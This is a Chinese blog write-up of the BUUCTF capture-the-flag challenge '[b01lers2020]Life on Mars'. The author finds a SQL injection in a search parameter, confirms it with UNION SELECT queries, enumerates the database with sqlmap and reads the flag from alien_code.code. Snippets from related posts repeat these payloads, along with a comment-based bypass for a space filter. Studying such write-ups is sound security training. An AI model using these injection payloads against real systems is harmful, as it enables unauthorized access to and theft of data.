BUUCTF--[b01lers2020]Life on Mars

最新推荐文章于 2023-08-21 09:40:15 发布
最新推荐文章于 2023-08-21 09:40:15 发布
阅读量457 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119004740
版权

 进入页面后什么也没发现,通过抓包看到一个可以参数

 跟着参数走可以看到一个这样的页面

看大佬的wp接下来使用联合查询进行探测
当查询两个字段时可以正常显示

/query?search=amazonis_planitia union select 1,2


 

 使用sqlmap扫描

扫描到这几个库,看名字应该是在alien_code中 

扫描该库的表

 

扫描该表的列名

 

 然后使用sqlmap   --dump 不出来内容,只好手工

/query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

成功获得flag 

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 ...
FZHei-B01.zip
05-13
FZHei-B01字体,windows下 latex 应用字体,利用管理员模式安装即可,成功后可消除相关latex缺少字体报错。
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2921
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
BUUCTF:[b01lers2020]Life on Mars
末初的CSDN博客
08-01 2024
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
BUUCTF__[b01lers2020]Life on Mars_题解
风过江南乱的博客
05-06 686
BUUCTF [b01lers2020]Life on Mars sql联合注入
[b01lers2020]Life on Mars
qq_46266956的博客
04-16 236
[b01lers2020]Life on Mars /query?search=hesperia_planum union select database(),group_concat(schema_name) from information_schema.schemata 得到库名:aliens、alien_code /query?search=hesperia_planum union select database(),group_concat(table_name) from informat
javax.servlet-api-4.0.0-b01.jar中文文档.zip
03-01
注:下文中的 *** 代表文件名中的版本号。 # 【javax.servlet-api-***.jar中文文档.zip】 中包含: 中文文档:【javax.servlet-api-***-javadoc-API文档-中文(简体)版.zip】 jar包下载地址:【javax.servlet-api-*...
mail-1.5.0-b01-API文档-中英对照版.zip
07-12
赠送原API文档:mail-1.5.0-b01-javadoc.jar; 赠送源代码:mail-1.5.0-b01-sources.jar; 赠送Maven依赖信息文件:mail-1.5.0-b01.pom; 包含翻译后的API文档:mail-1.5.0-b01-javadoc-API文档-中文(简体)-英语-...
javax.servlet-api-3.1-b01.jar中文文档.zip
03-01
注:下文中的 *** 代表文件名中的版本号。 # 【javax.servlet-api-***.jar中文文档.zip】 中包含: 中文文档:【javax.servlet-api-***-javadoc-API文档-中文(简体)版.zip】 jar包下载地址:【javax.servlet-api-*...
[b01lers2020]Life on Mars (难发现的sql注入)
qq_62046696的博客
11-21 558
打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。到这里只能burp抓个包看看 抓包两个界面发现了get传参,考虑是否存在sql注入尝试额以后发现只返回了一个1,试一下别的引号闭合 直接进行查询所有的数据库名 看一下alien_code数据库 发现code表 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod
[b01lers2020]Life on Mars WRITE UP
Swee
09-21 425
拿到网站没啥好说的,基本是静态的页面,先抓包。 发现包有问题,search参数 非常的奇怪 经初步判定有SQL注入 ORDER BY 2 得到 有两个参数 进行联合查询,得到所有数据库的名称 发现有个贼奇怪的 叫alien_code 进去看看 /query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_sc
[b01lers2020]Life on Mars1
mlws1900的博客
08-21 212
search=这个参数一直在发生改变。可以发现它返回了json格式的数据,猜测是sql注入。放进hackbar进行操作。后面就是sql注入一梭子。orderby进行判断。看到回显点,进行查询。
[b01lers2020]Life on Mars 1
m0_73728268的博客
04-02 129
sqlmap
openwrt-openjdk8
最新发布
01-04
在OpenWrt系统下安装OpenJDK 8,你可以按照以下步骤进行操作:... OpenJDK 64-Bit Server VM (build 25.275-b01, mixed mode) ``` 如果你看到了类似的输出,那么恭喜你,你已经成功在OpenWrt系统下安装了OpenJDK 8。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值